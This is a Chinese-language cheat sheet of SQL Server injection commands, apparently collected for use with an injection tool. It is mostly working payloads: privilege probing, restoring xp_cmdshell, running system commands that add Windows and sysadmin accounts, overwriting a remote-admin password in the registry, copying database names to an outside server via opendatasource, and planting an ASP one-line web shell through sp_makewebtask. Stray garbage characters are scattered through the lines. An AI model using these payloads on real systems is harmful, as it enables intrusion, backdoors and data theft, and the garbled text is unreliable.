阿D常用的一些注入命令
/ X" u9 F$ e6 k0 o//看看是什么权限的
5 r$ ?" g% @+ m: ]5 B3 Uand 1=(Select IS_MEMBER('db_owner'))- h! B0 i& B; m
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--/ @& n6 s1 B# x, p" X* d# b* I
s: g3 ~5 P4 i; u r5 s8 c//检测是否有读取某数据库的权限 b; o: |) J5 b" T( u) d
and 1= (Select HAS_DBACCESS('master'))
7 d7 a) y+ W U' U5 Z' J+ _And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
7 l/ }6 [: i% t6 {
/ D( V, l8 W6 E' e8 ^6 l
9 ~* l8 g' O0 J. y$ `数字类型
3 B+ B$ h/ H5 D9 Zand char(124)%2Buser%2Bchar(124)=0( q4 q8 A0 v3 @3 t. j! W
& s4 m+ j; {( Z* e$ ?( A字符类型
- U/ L" M; b$ @' and char(124)%2Buser%2Bchar(124)=0 and ''='
% R; K; r, r& E1 e/ c
" Y" p! } l% j7 d) u) G0 V" y! w搜索类型; Y+ L, P& b9 W! E) K+ j
' and char(124)%2Buser%2Bchar(124)=0 and '%'='% X1 F/ W; k* w/ _& u; N- V h
0 \% r5 g, b+ C: H
爆用户名$ H4 w n/ N1 e( X) X9 m
and user>0, o3 C* y6 o$ f) I
' and user>0 and ''='
0 L: J; R* J2 F `. E3 Z: Z! J& Q7 W- w
检测是否为SA权限4 g+ k$ z2 K( o) m4 G2 A
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
1 y" U' u2 G& b8 h1 YAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
; T0 c+ W9 j% u; n* \5 f/ D7 D# c. X" x' b
检测是不是MSSQL数据库) Y/ b9 @- F" [/ f# ?4 S
and exists (select * from sysobjects);--
g" `2 h( l: t" v4 Z! \3 K* ^& d4 o+ ~. B; L1 X* d
检测是否支持多行
. @0 p0 P: V: m0 d: K;declare @d int;--
! @* C; [* j2 k9 c
0 w5 }& E. g! W E+ ~6 `0 Z" r恢复 xp_cmdshell3 C5 f' @/ {+ @2 ^
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--& `4 L7 O, Q. o. j a* h! W
2 g9 }' C; y% j6 a! c
% t7 G; D6 Z* _) x; n/ y3 f4 ^select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
: r, b; m, W( R" Y" h9 |3 r& S8 X+ k! r" u/ [' t" l+ q- o
//-----------------------
5 X3 H' D8 k5 @: W" S. M// 执行命令
8 Z% B" R4 e5 [, U0 j; D//-----------------------
7 w6 ~* t, o2 P! E8 Y首先开启沙盘模式:
9 ~. x$ `' l4 F' ~1 X+ vexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',18 p I: r, p% E3 y) Q# q( H8 f
5 b! J2 \$ I# l+ X0 c$ @5 q
然后利用jet.oledb执行系统命令: z2 h) e. Q- ^3 c$ b- y: E+ @
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
% B& d+ `1 A: v6 ?" S. w' O
6 e+ ? y8 l! T4 z$ l执行命令& K3 x) M8 n" f) O8 Y- U9 m, e
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
0 C2 C% o' N9 s. H
8 A6 ]( h7 X, e3 v V8 WEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'8 I8 K/ W1 L7 ]& o1 p/ e; Y
/ P& x2 l8 j& b. s: U3 g判断xp_cmdshell扩展存储过程是否存在:, B$ ]& r4 R* {3 O: p) d. W+ h# H8 G
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
- N" |5 l5 f( P- ~# K) v! Q. Q
2 [/ r0 c O0 V2 T# F3 a, J写注册表& v" i/ B% x) G1 M; g0 x) j3 f2 o
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1* E8 H3 q8 N- [% O8 Y7 ^
% ~" U& Y) i/ U; v7 w4 T
REG_SZ
# {- _: l" s+ b
/ Q1 T0 P4 \, k) N读注册表1 G2 U+ _8 p& X$ H
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
/ a, ~. y, J3 G8 Y( o7 L" m% X
# L8 M; o+ ?4 P2 f/ _$ `7 N# L/ L读取目录内容- X L# w- }( G, i7 S1 p
exec master..xp_dirtree 'c:\winnt\system32\',1,1) ?: I. k6 w r0 B) }. ]
1 D/ f! F0 q8 l0 x% P" B8 ^+ ~
* a. q/ H7 Z( k/ [9 {数据库备份
7 W4 y) Y/ s, d4 V( ]8 ^backup database pubs to disk = 'c:\123.bak'
6 d$ a! Q3 e$ O. E# v9 I& m6 B% ^; t; L3 k$ z$ Q3 d2 i4 q, A {
//爆出长度
+ O |9 s# ]" n+ CAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
( M) ^0 d$ K/ w; g. ?& T% c% f4 R: ^6 g R' ?% G) C- R" J( {
) ~' t i" j$ d7 m. T
4 e, }8 S( ^* e' ~更改sa口令方法:用sql综合利用工具连接后,执行命令:8 y! K/ d: H; \, I
exec sp_password NULL,'新密码','sa'
7 ~6 \6 `0 s/ Q; [" R. b; ]( ~" D
添加和删除一个SA权限的用户test:3 ?0 ?# U4 j! b" ?! Z
exec master.dbo.sp_addlogin test,ptlove1 R9 K/ L9 @. ?5 j, ^
exec master.dbo.sp_addsrvrolemember test,sysadmin
6 W; ^4 \; u' u9 }( w
5 \" c5 r0 i! p: D删除扩展存储过过程xp_cmdshell的语句: : ]$ ]/ Z6 v' r8 j
exec sp_dropextendedproc 'xp_cmdshell'
% ] ~2 e" c0 F# {" Z1 o, j) T+ g4 j3 v
添加扩展存储过过程
+ |3 P+ K& E- c& s% f* bEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
9 n5 G- B1 t @/ L) ^GRANT exec On xp_proxiedadata TO public ; e9 W! C& o% Z$ ]# D8 @1 k+ U
0 e" B- F4 @4 r1 A: n' z) ~7 e/ A
停掉或激活某个服务。
$ j [& `: A# O7 \
" D) [+ D5 N8 ?* j$ Gexec master..xp_servicecontrol 'stop','schedule'
8 |- e w+ ?$ R5 z! Z* bexec master..xp_servicecontrol 'start','schedule'5 C& u- [7 l2 a2 D
. B& }7 t c& z; S: K
dbo.xp_subdirs+ V3 o* m, Z" y+ p+ e& |9 ~4 C6 N4 o
/ {8 D$ `4 g- W' o; ?' A u' v$ J只列某个目录下的子目录。# d, G7 {: z4 c
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'- R% ?' U) c6 w$ K0 z
+ s. Q& i$ \; v' P* Fdbo.xp_makecab
8 t. _! Q6 p8 U& b0 ^( x0 I/ [: W) N& L y& N( q+ `
将目标多个档案压缩到某个目标档案之内。
( [( ` h& l3 f3 g所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。4 S7 t# U. T; u; ~0 f4 h
. Y8 x6 \8 N% v$ Zdbo.xp_makecab' j" n$ J9 F, R
'c:\test.cab','mszip',1,1 {3 r. z( S% P0 b/ t! v q0 ^
'C:\Inetpub\wwwroot\SQLInject\login.asp',
- v' m* K' V+ a' x& ^- B'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
( r( R( o+ N1 e
: R8 t; Z W& [# N2 Axp_terminate_process
0 v1 t) N9 | F D# }; ~ s- u. r+ U( D0 f4 ]8 x
停掉某个执行中的程序,但赋予的参数是 Process ID。
- i4 e3 Q- ^" u- U: S利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID% ~+ y; t4 ]; w. E2 Z9 l* E e
" |$ `: D7 B7 k0 L5 O+ q
xp_terminate_process 2484% K3 f# b2 q+ I
7 J% k4 t. o0 M% }9 i# pxp_unpackcab
" m6 X% b% s+ @7 a" v- ?0 ~/ r, V* }
解开压缩档。: H6 s7 K1 p& H# r/ ]( g4 ^0 O0 f
6 V4 M0 H! J( bxp_unpackcab 'c:\test.cab','c:\temp',1) i3 n2 T. [4 Y" c n* x2 X m
3 K/ b" |. f$ j% o r
+ X# R2 I( ^ X某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12345 z( d- J8 R- Y* a. y: k2 k4 I
+ K2 U0 y6 W6 S* e9 o1 t
create database lcx;4 ~0 |2 ]- m9 t U# I% @
Create TABLE ku(name nvarchar(256) null);
" k; d9 i5 {! P- g0 I0 w9 rCreate TABLE biao(id int NULL,name nvarchar(256) null);1 ~+ R8 r, C1 S! d- x) @
6 V+ d) k) }; Q% O4 w+ V( x, ]//得到数据库名% ^$ D( j5 Y# S5 W7 Q& @
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
; }: e( w' e6 u/ G5 j+ r
8 U7 J) E' y. n2 x A( z0 g
7 ~( W6 |: _1 d' l//在Master中创建表,看看权限怎样( ~, o8 T0 J8 n) `
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
8 Z P* p! }3 r9 g) v6 c. r9 S( a- w. X$ w$ ~
用 sp_makewebtask直接在web目录里写入一句话马:* f7 @& s3 _ y
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--2 @5 A& N/ z. ?( P9 }' f3 y3 O1 {
4 m1 W5 \ J6 W//更新表内容
& J; v% Y7 w' c& g7 QUpdate films SET kind = 'Dramatic' Where id = 123: c* A8 C8 e$ c1 X( o
3 `( H! D- F; Q3 [9 l
//删除内容
8 p- Q) U$ Y1 I. Fdelete from table_name where Stockid = 3 |